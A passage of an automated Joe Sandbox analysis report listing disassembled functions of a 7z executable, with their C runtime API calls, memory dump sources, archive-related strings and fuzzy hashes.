                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$fputs
                                                                                                                                                                                                                                          • String ID: = $h<6
                                                                                                                                                                                                                                          • API String ID: 2444650769-4264137474
                                                                                                                                                                                                                                          • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                          • Instruction ID: c56ca36fc55969507640c3565708bc4dd6953781f55ca83abfb65ae17843b4df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC21856321894095CA22EF15E4816AFA730E7DA7D1F445222FF5E4B779DF28C999C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00339BCC: free.MSVCRT ref: 00339C11
                                                                                                                                                                                                                                            • Part of subcall function 00339BCC: free.MSVCRT ref: 00339C19
                                                                                                                                                                                                                                            • Part of subcall function 00339BCC: free.MSVCRT ref: 00339C3B
                                                                                                                                                                                                                                            • Part of subcall function 00339BCC: free.MSVCRT ref: 00339D2A
                                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 00339E66
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339ECA
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339ED4
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339F13
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339F1B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339F28
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339F49
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00339F51
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3584677832-0
                                                                                                                                                                                                                                          • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                          • Instruction ID: a792e56f17a084899d3ce9bf13bfb41c5da7beb58c1f7a8dde465eeca4f3ad41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1411926305A4095CB16FF16E88029FA765F789BE8F451222EF6D4B764DF78C896C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                                                                                                          • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                          • Instruction ID: 38a751aa41976115b4dfbdeeab7fb1adf9ac9794945b09d9ceaa5fd693b8baf0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1316EB5114B42CAEB16DF25E89071A73A9F3847A6F101229EA6E436B4DF3CC649CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                                                                                                          • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction ID: 2a659b7262c3077c41214f515dc2863c3c7f09e490b6c5c7b445fd34f33afd8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18212DB5214F428AEB12DF29EC9071A7369F784766F501225EA6E477B4DF3CC649CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                                                                                                          • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction ID: 2a659b7262c3077c41214f515dc2863c3c7f09e490b6c5c7b445fd34f33afd8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18212DB5214F428AEB12DF29EC9071A7369F784766F501225EA6E477B4DF3CC649CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                                                                                                          • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction ID: 2a659b7262c3077c41214f515dc2863c3c7f09e490b6c5c7b445fd34f33afd8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18212DB5214F428AEB12DF29EC9071A7369F784766F501225EA6E477B4DF3CC649CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                          • Instruction ID: 1a6980891e439499c811e7dee6d2ad1f8936eff20b7380c55ae62d5c30d6e94f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B115423741A449ACA26FF72D99116A7314EB97BB0B194371DF3D1B795DF24D8B28300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                          • Instruction ID: 480edd24d04d3c9562a37b39b545d6317273ec501431da446bba7318ebf84010
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D111B22311A4089CF09EF75C8A126E7320FBC6F98B044671AF3E8B765CF24C8568344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                          • Instruction ID: 6a05a9303bc3052b5545d44b1fd08002686f3828ea408103dde6667c07b7fc39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09515862200A4491CF16EF25D4D02EE6761F7C9FC8F904522EB4E9B729DF78DA9AC341
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 003515D5
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: memset.MSVCRT ref: 0035B20D
                                                                                                                                                                                                                                            • Part of subcall function 0035B1C8: fputs.MSVCRT ref: 0035B232
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$memset
                                                                                                                                                                                                                                          • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                                                          • API String ID: 3543874852-295398807
                                                                                                                                                                                                                                          • Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                          • Instruction ID: f45680face3f281e84b8bde38a66cd0d9d9f73ae6dec4bffe05633a1ce23688b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311C166742A8284DF56DB29D9447ED2364E749B99F5C8435DE0D4B220EF39C5CAC310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352E47
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352E57
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00352EA4
                                                                                                                                                                                                                                            • Part of subcall function 00352CFC: fputs.MSVCRT ref: 00352D41
                                                                                                                                                                                                                                            • Part of subcall function 00352CFC: fputs.MSVCRT ref: 00352DCF
                                                                                                                                                                                                                                            • Part of subcall function 00352CFC: free.MSVCRT ref: 00352DFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$free
                                                                                                                                                                                                                                          • String ID: =
                                                                                                                                                                                                                                          • API String ID: 3873070119-2525689732
                                                                                                                                                                                                                                          • Opcode ID: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                          • Instruction ID: 12e79a3ae9307c7a821f4f782db147c0e5c5465e1ec06125e40d8d6236512975
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F0DB5230490050D926EB26EA4177F5321A7CAFF5F049321AD6D0BBB8DF2CC5568700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00344A5C
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00344A67
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00344AE4
                                                                                                                                                                                                                                            • Part of subcall function 00313314: memmove.MSVCRT ref: 00313339
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00344B0F
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00344B1A
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3352498445-0
                                                                                                                                                                                                                                          • Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                          • Instruction ID: 7a1bac5e888b105d2b871751d0afbe5b5d7e8f33dad8173811c7dd9bac93c95d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D741B023204B8495CB16EF25D4503AE77A1FB8AB88F481132EF8E4B729DF38D5A5C314
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                          • Instruction ID: 01e0caf78bc92dfc9a2c37417e74c9753b44959299f9e7a7848d16d3a82d0986
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E318FB5114B41CAEB16DF29E88075A3778F384B66F405225EA5D077B4DB3CC689CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$fputsmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4106585527-0
                                                                                                                                                                                                                                          • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                          • Instruction ID: 77e96007f67628dd9642f25e1631805f6cf61a932a94379e5edd3275fa689307
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E401526320884091DA25AB25E85119FA721E7D9BF4F045331BA6F8B7F8DE28C6D6C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFilefree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936811914-0
                                                                                                                                                                                                                                          • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                          • Instruction ID: b64ba779d1a36116811d63afeeed595bded0902bcb798b54188fd059edf7142d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A01A722304A1192D636AB61D9812FE17689B8E7F5F180321AD6A8B7A5CF24CEC79711
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFilefree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936811914-0
                                                                                                                                                                                                                                          • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                          • Instruction ID: 83a53687609292a1c6dee47a3f7804ba3216f5e3a71d90316003e0c0266a8e16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F0A426208A4485CA36AB74ED902FE12309BCE7F5F580320EA798B7F5DF14CAC68700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
